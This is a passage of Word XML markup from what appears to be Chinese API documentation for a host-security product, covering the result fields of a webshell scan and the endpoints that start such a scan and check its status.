      <w:tr w:rsidR="00497C54" w14:paraId="6030AE9C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4080CCE8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2841C31D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DE6F969" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20FB3518" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5E23F491" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46A78F28" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>typeDesc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="252BCE5F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C98C803" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C3DE917" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="45B8BB15" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="246A3705" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>serverName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19CD7437" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79F01AB3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B3D3220" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>域名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6F0A539E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AEDFD14" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>filePath</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7712CA0B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26DE09C6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F29BB7C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6D0A8011" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A36D0DA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>fileMd5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23F73029" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CFF5D33" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BA7523B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件MD5值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3254D73A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46DFF5D3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>fileSize</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18E67DFD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D7C20AF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(15）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DFEC83D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件大小</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1EA02C52" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BD1AAB4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>regexDesc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="358EA50A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C5E4EF8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09084DDF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1F46A004" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01D10422" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>matchCount</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A98449F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E8D716A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2344BE56" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>命中规则数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="49BEF511" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73758AD3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>modifyTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F5BA487" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79C3D430" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68B02D19" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>最后修改时间，时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="17FA36A3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DCC76FA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>whiteRuleEffect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67FD1A94" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73F17DB9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="127119DF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否命中白名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="750ECEA6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="152" w:name="web后门扫描"/>
      <w:bookmarkEnd w:id="151"/>
      <w:r>
        <w:t>Web后门扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541AA26D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供web后门执行扫描任务。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD60DA3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD5D81E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/websecurity/webshell/{linux|win}/check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D0CFB0"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225"/>
        <w:gridCol w:w="1213"/>
        <w:gridCol w:w="1034"/>
        <w:gridCol w:w="6610"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="57D6575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DBC7624" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="220D2FCD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EEF9473" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="781EFCD4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="35DC8B8C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54E2587C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>realmType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A6974C0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AB0AC37" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36CB71E1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>范围，0:当前账号管理下的全部主机； 1:自定义主机； 2:自定义业务</w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>组；</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="463111C9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68E24649" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>agentIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BAF42D9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DA460FE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4629A1CD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机列表，如果realmType=1, 则agentIds不为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6D9481FA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63841D77" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E6B4914" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54DF5EDA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1846C231" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组列表，如果realmType=2, 则groups不为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="754B4C27" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B56994" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>// 当选全部主机</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "realmType": 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>// 当选自定义主机</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "realmType": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "agentIds": ["979f3c4d44b2e765", "979f3c4d44b2e766"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>// 当选自定义业务组</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "realmType": 2</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "groups": [1, 2, 3]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA044E2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057F5E15" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "flag": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02490627"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497C54" w14:paraId="299F82A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67DB453" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F7BA9CC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="262DD931" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47F1FDB9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="44699BE1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67639EA6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73CA34AC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F5399AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="353B70F8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>true:成功 false:失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="228DF303" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="153" w:name="web后门查询扫描状态"/>
      <w:bookmarkEnd w:id="152"/>
      <w:r>
        <w:t>Web后门查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB07FA0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供web后门扫描任务的状态查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201CE62F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB75060" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/websecurity/webshell/{linux|win}/check/status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0693284D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567DD901" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FADCB2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F170A2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/websecurity/webshell/linux/check/status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477AB3C5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494F59E4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
